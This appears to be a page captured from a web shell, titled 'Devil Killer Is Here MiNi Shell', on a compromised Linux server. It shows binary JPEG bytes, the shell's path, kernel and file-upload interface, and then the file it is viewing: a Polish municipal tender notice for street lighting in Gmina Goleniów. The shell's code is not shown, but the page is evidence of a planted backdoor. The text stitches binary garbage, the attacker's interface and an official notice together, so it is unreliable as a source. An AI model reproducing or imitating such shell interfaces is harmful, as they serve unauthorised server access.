JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210607/0007434101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00074341 z dnia 2021-06-07</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie oświetlenia ciągów komunikacyjnych w Gminie Goleniów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Goleniów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684367</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Lotników 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Goleniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(91) 4698200</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(91) 4698298</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@goleniow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.goleniow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie oświetlenia ciągów komunikacyjnych w Gminie Goleniów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-43229427-c52a-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00074341</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008614/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Budowa oświetlenia ulicznego na terenach wiejskich gminy Goleniów</p> <p class="mb-0">1.1.11 Budowa oświetlenia ulicznego na terenie miasta Goleniów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://goleniow.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://goleniow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (tj. Dz. U. z 2020 r. poz. 344).<br/>2. W postępowaniu o udzielenie zamówienia ofertę, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym bądź kwalifikowanym podpisem elektronicznym.<br/>3. Komunikacja między zamawiającym a wykonawcami odbywa się w języku polskim przy użyciu Platformy Przetargowej Gminy Goleniów: https://goleniow.logintrade.net/ <br/>4. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż określony w SWZ.<br/>5. Zamawiający informuje, iż wszelka korespondencja dotycząca niniejszego postępowania (pomiędzy zamawiającym a wykonawcami) będzie odbywała się za pośrednictwem Platformy Przetargowej Gminy Goleniów: https://goleniow.logintrade.net/rejestracja/ustawowe.html<br/>6. Zamawiający nie ponosi odpowiedzialności za złożenie przez Wykonawcę oferty w sposób niezgodny z instrukcją korzystania z www.logintrade.pl w szczególności za sytuację, gdy oferta nie zostanie złożona w miejscu wskazanym przez platformę określoną w punkcie 3. Nieprawidłowe złożenie oferty skutkować będzie nieuwzględnieniem jej w prowadzonym postepowaniu. <br/>7. Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej Gminy Goleniów: ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>8. Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy Przetargowej Gminy Goleniów:<br/>1)	dopuszczalne przeglądarki internetowe:<br/>•	Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11<br/>•	Google Chrome 31<br/>•	Mozilla Firefox 26<br/>•	Opera 18<br/>2)	pozostałe wymagania techniczne:<br/>•	dostęp do sieci Internet<br/>•	obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax<br/>•	włączona obsługa JavaScript<br/>•	zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>•	zainstalowany Acrobat Reader<br/>•	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy<br/>3)	Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach danych określonych w przepisach wydanych na podstawie §2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz. 2452). Równocześnie Zamawiający rekomenduje na format danych przesyłanych plików: pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>-administratorem Pani/Pana danych osobowych jest Urząd Gminy i Miasta, Plac Lotników 1, 72-100 Goleniów;<br/>- Kontakt z administratorem bezpieczeństwa informacji w Urzędzie Gminy i Miasta, Plac Lotników 1,: e-mail: abi@goleniow.pl lub pisemnie na adres siedziby administratora danych osobowych;<br/>- Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu wypełnienia obowiązku prawnego ciążącego na administratorze, związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>- odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j Dz. U. z 2019 r. poz. 2019 ze zm.), dalej „ustawa Pzp”; <br/>- Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; a po tym czasie przez okres wymagany przepisami szczególnymi prawa, w szczególności ze względu na cele archiwalne- zgodnie z JRWA: dokumentacja zamówień publicznych posiada kategorię archiwalną B5 (okres przechowywania 5 lat) natomiast umowa zawartą w wyniku postępowania w trybie zamówień publicznych posiada kategorię archiwalną B10 (okres przechowywania 10 lat);<br/>- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/>- w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że <br/>1) posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących*;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>2) nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>3)	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Panu danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WGG.271.1.09.2021.EJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest zadanie inwestycyjne pn.: „Wykonanie oświetlenia ciągów komunikacyjnych w Gminie Goleniów” w tym wykonanie wszystkich prac prowadzących do osiągnięcia stanu zgodnego z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, SWZ oraz projektowanymi postanowieniami umowy w sprawie zamówienia publicznego.<br/>2. Zamawiający dokonał podziału zamówienia na 2 części:<br/>Część nr 1: „Wykonanie oświetlenia ciągów komunikacyjnych na terenach wiejskich Gminy Goleniów”<br/>Część nr 2: „Wykonanie oświetlenia ciągów komunikacyjnych w mieście Goleniów”<br/>3. Zakres przedmiotu zamówienia do wykonania w ramach części nr 1 obejmuje:<br/>1)	zamawiający przewiduje, że na etapie realizacji zamówienia, będzie korzystał z prawa opcji. Zgodnie z regulacjami ustawowymi prawo opcji jest uprawnieniem Zamawiającego, a nie obowiązkiem do realizacji pełnego zakresu przedmiotu zamówienia tj. z prawem opcji. <br/>2)	minimalny poziom zamówienia, który Zamawiający planuje zrealizować w terminie obowiązywania umowy czyli ZAMÓWIENIE PODSTAWOWE obejmuje budowę oświetlenia ulicznego n/w lokalizacjach:<br/>a)	Imno- przystanki autobusowe,<br/>b)	Tarnowiec- od przystanku autobusowego,<br/>c)	Mosty- przy szkole,<br/>d)	Pucice- Osiedle Wrzosowe,<br/>e)	Pucice ul. Rzemieślnicza,<br/>f)	Białuń ul. Sielankowa ,<br/>g)	Zabród,<br/>h)	Załom ul. Parkowa,<br/>i)	Komarowo- plac zabaw i boisko,<br/>j)	Marszewo dz. nr 120/5,<br/>k)	Lubczyna- zakręt przy ul. Lipowej,<br/><br/>3)	zamówienie z użyciem PRAWA OPCJI to zamówienie w ramach którego Zamawiający dopuszcza możliwość zwiększenia zamówienia podstawowego o dodatkowe ilości robót budowlanych, zgodnie z cenami wykazanymi przez Wykonawcę w Formularzu Cenowym, stanowiącym załącznik nr 1A do SWZ. Zamówienie podstawowe (opisane szczegółowo w ppkt 2) może ulec zwiększeniu o prawo opcji, które obejmuje budowę oświetlenia ulicznego w n/w lokalizacjach:<br/>a)	Miękowo- od posesji nr 12G w stronę lasu,<br/>b)	Czarna Łąka ul. Przyjazna,<br/>c)	Stawno- droga do kościoła<br/>4)	zamawiający zastrzega sobie możliwość skorzystania z prawa opcji w niepełnym zakresie tzn. w ramach PRAWA OPCJI Zamawiający może zlecić – według własnego uznania – wykonanie budowy oświetlenia ulicznego w jednej, kilku lub wszystkich lokalizacjach, o których mowa w powyższym ppkt 3) lit. a) - c).<br/>5)	prawo opcji realizowane będzie na takich samych warunkach jak zamówienie podstawowe.<br/>6)	cena robót budowlanych zamawianych w ramach prawa opcji zostanie określona przez Wykonawcę w formularzu cenowym, stanowiącym załącznik nr 1A do SWZ, który zostanie złożony wraz z ofertą. Łączna cena za zamówienie objęte prawem opcji określone przez Wykonawcę w formularzu ofertowym, stanowiącym załącznik nr 1.1. do SWZ ma wynikać z jej obliczenia w formularzu cenowym, stanowiącym załącznik nr 1A do SWZ.<br/>7)	Zamawiający uprawniony będzie do skorzystania z prawa opcji przez okres obowiązywania umowy, wobec tego jeśli przed upływem terminu na jaki została zawarta umowa, zostaną zrealizowane roboty budowlane przewidziane w ramach zamówienia podstawowego, Zamawiający będzie mógł zamawiać dalej, aż do wykorzystania wszystkich robót budowlanych przewidzianych jako opcja.<br/>8)	o zamiarze skorzystania z prawa opcji Zamawiający poinformuje Wykonawcę odrębnym pismem/oświadczeniem.<br/>9)	w przypadku, gdy Zamawiający nie skorzysta z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu. Warunkiem skorzystania z prawa opcji będzie posiadanie w budżecie środków finansowych na realizację dalszej budowy oświetlenia ciągów komunikacyjnych.<br/>10)	postanowienia SWZ odnoszące się do ZAMÓWIENIA PODSTAWOWEGO przedmiotu zamówienia znajdują odpowiednie zastosowanie do zamówienia objętego prawem opcji.<br/>4. Dalszy szczegółowy opis przedmiotu zamówienia określono w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)	zamówienie z użyciem PRAWA OPCJI to zamówienie w ramach którego Zamawiający dopuszcza możliwość zwiększenia zamówienia podstawowego o dodatkowe ilości robót budowlanych, zgodnie z cenami wykazanymi przez Wykonawcę w Formularzu Cenowym, stanowiącym załącznik nr 1A do SWZ. Zamówienie podstawowe może ulec zwiększeniu o prawo opcji, które obejmuje budowę oświetlenia ulicznego w n/w lokalizacjach:<br/>a)	Miękowo- od posesji nr 12G w stronę lasu,<br/>b)	Czarna Łąka ul. Przyjazna,<br/>c)	Stawno- droga do kościoła<br/>2)	zamawiający zastrzega sobie możliwość skorzystania z prawa opcji w niepełnym zakresie tzn. w ramach PRAWA OPCJI Zamawiający może zlecić – według własnego uznania – wykonanie budowy oświetlenia ulicznego w jednej, kilku lub wszystkich lokalizacjach, o których mowa w powyższym ppkt 1) lit. a) - c).<br/>3)	prawo opcji realizowane będzie na takich samych warunkach jak zamówienie podstawowe.<br/>4)	cena robót budowlanych zamawianych w ramach prawa opcji zostanie określona przez Wykonawcę w formularzu cenowym, stanowiącym załącznik nr 1A do SWZ, który zostanie złożony wraz z ofertą. Łączna cena za zamówienie objęte prawem opcji określone przez Wykonawcę w formularzu ofertowym, stanowiącym załącznik nr 1.1. do SWZ ma wynikać z jej obliczenia w formularzu cenowym, stanowiącym załącznik nr 1A do SWZ.<br/>5)	Zamawiający uprawniony będzie do skorzystania z prawa opcji przez okres obowiązywania umowy, wobec tego jeśli przed upływem terminu na jaki została zawarta umowa, zostaną zrealizowane roboty budowlane przewidziane w ramach zamówienia podstawowego, Zamawiający będzie mógł zamawiać dalej, aż do wykorzystania wszystkich robót budowlanych przewidzianych jako opcja.<br/>6)	o zamiarze skorzystania z prawa opcji Zamawiający poinformuje Wykonawcę odrębnym pismem/oświadczeniem.<br/>7)	w przypadku, gdy Zamawiający nie skorzysta z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu. Warunkiem skorzystania z prawa opcji będzie posiadanie w budżecie środków finansowych na realizację dalszej budowy oświetlenia ciągów komunikacyjnych.<br/>8)	postanowienia SWZ odnoszące się do ZAMÓWIENIA PODSTAWOWEGO przedmiotu zamówienia znajdują odpowiednie zastosowanie do zamówienia objętego prawem opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Prawo zamówień publicznych, polegających na powtórzeniu podobnych robót budowlanych w zakresie do 30 % wartości zamówienia podstawowego, które są przedmiotem niniejszego postępowania i są zgodne z przedmiotem zamówienia podstawowego. Pozycje z przedmiaru robót opisują rodzaj robót jakie Zamawiający przewiduje do realizacji w ramach powtórzenia podobnych robót. Podstawą do negocjacji, w szczególności ceny za powtórzone podobne roboty, będzie kosztorys ofertowy Wykonawcy złożony w niniejszym postępowaniu. Warunki powtórzonego zamówienia będą takie same jak zapisane w niniejszej SWZ.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej w ramach części nr 1 zamawiający będzie się kierował następującymi kryteriami:<br/>a)	cena oferty za wykonanie zamówienia podstawowego (C1) – 40 pkt<br/>b)	cena oferty za wykonanie zamówienia objętego prawem opcji (C2)- 20 pkt<br/>c)	wydłużenie okresu gwarancji i rękojmi (G) -40 pkt<br/><br/>W odniesieniu do wykonawców, których oferty nie podlegają odrzuceniu dokonana zostanie ocena oferty w następujący sposób:<br/><br/>ad. a) Sposób obliczenia punktów dla kryterium cena oferty za wykonanie zamówienia podstawowego (C1):<br/><br/>Maksymalna ilość punktów 